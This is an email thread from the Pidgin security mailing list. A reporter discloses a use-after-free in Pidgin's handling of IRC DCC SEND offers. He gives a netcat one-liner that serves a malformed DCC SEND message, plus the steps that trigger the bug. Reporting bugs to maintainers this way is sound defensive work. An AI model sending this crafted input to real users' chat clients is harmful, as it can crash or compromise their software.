Pidgin uaf when cancelling file select dialog after accepting DCC SEND

Joseph Bisch joseph.bisch at gmail.com
Wed Sep 20 22:25:10 EDT 2017


Sorry, yes. That's what I mean.

On Wed, Sep 20, 2017 at 10:20 PM, Eion Robb <eion at robbmob.com> wrote:
> Sorry, just to check, UAF meaning "use after free"?
>
> On 21 September 2017 at 14:05, Joseph Bisch <joseph.bisch at gmail.com> wrote:
>>
>> Hi,
>>
>> Here is the reproducer:
>>
>> echo $':c PRIVMSG a :\x01DCC SEND a a a a\x01\r\n' | nc -l -p 6667
>>
>> Then you must accept the dcc send and cancel out of the file select
>> dialog. If you either click save on the file select dialog or you do
>> not accept the dcc send, then the uaf does not happen.
>>
>> Joseph
>>
>> _______________________________________________
>> security mailing list
>> security at pidgin.im
>> https://pidgin.im/cgi-bin/mailman/listinfo/security
>
>

